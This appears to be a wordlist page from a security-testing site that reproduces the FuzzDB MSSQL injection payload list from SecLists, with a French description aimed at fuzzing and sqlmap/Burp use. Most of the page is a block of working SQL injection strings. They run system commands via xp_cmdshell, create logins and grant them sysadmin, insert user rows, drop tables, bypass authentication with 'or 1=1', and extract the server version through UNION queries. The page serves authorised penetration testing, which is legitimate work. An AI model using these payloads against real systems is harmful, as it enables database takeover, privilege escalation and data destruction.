MSSQL Injection (FuzzDB)

# you will need to customize/modify some of the vaules in the queries for best effect '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 'create user name identified by 'pass123' -- 'create user name identified by pass123 temporary tablespace temp default tablespace users; ' ; drop table temp -- 'exec sp_addlogin 'name' , 'password' -- ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- ' grant connect to name; grant resource to name; -- ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) --

Payloads d'injection spécifiques à Microsoft SQL Server incluant l'exécution via xp_cmdshell, la création de login/rôle et les unions de divulgation de version. Cible les back ends confirmés comme étant MSSQL.

Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 1.0 KB et s'associe bien avec des outils tels que sqlmap, burp. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne où la vitesse est moins contraignante.

Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans votre presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement depuis sa source d'origine sur GitHub.

Provient de danielmiessler/SecLists et distribuée sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.

Aperçu